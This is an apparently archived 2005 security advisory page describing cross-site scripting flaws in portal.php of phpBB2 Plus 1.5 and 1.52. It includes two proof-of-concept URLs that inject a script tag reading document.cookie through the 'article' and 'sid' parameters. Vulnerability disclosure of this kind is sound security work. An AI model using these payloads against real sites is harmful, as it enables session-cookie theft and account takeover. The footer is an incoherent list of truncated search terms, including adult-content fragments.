about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPBB2 Plus Portal.PHP Multiple Cross-Site Scripting Vulnerabilities


Title PHPBB2 Plus Portal.PHP Multiple Cross-Site Scripting Vulnerabilities
Published 2005-04-13-12:00AM
Updated 2005-04-13-05:28PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  dcrab <dcrab@hackerscenter.com> is credited with the discovery of these vulnerabilities.
Vulnerable  phpBB2 phpBB2 Plus 1.52
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.13
phpBB2 phpBB2 Plus 1.5
Not Vulnerable  
Code   No exploit is required.

The following proof of concept URIs are available:
http://www.example.com/portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 30 Nov 2009 22:23:15 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
all cartoo SAXY GRIL 000 buffer ove port 161 sexi gril www.388ys. WWW.BANGBU sym www,com89 sdwr Thiresa se 200 /compo news for c Exploits S Thiresa se all cartoo www.3c800. news for c 2...FxGB.p video orn Video zoop momota xxx sdwr 2wire 1701 domain freevedioc news for c mambo Remo SpySubtrac air news+for+C Crack Data naruto se www.rczpw. Trictvideo rcp sp2 http serve www.2058.c Malaysia s Woltlab Bu scx Www.videos Redaxo news for c sex insex www.shocki stickam afffidavit www.yi98.c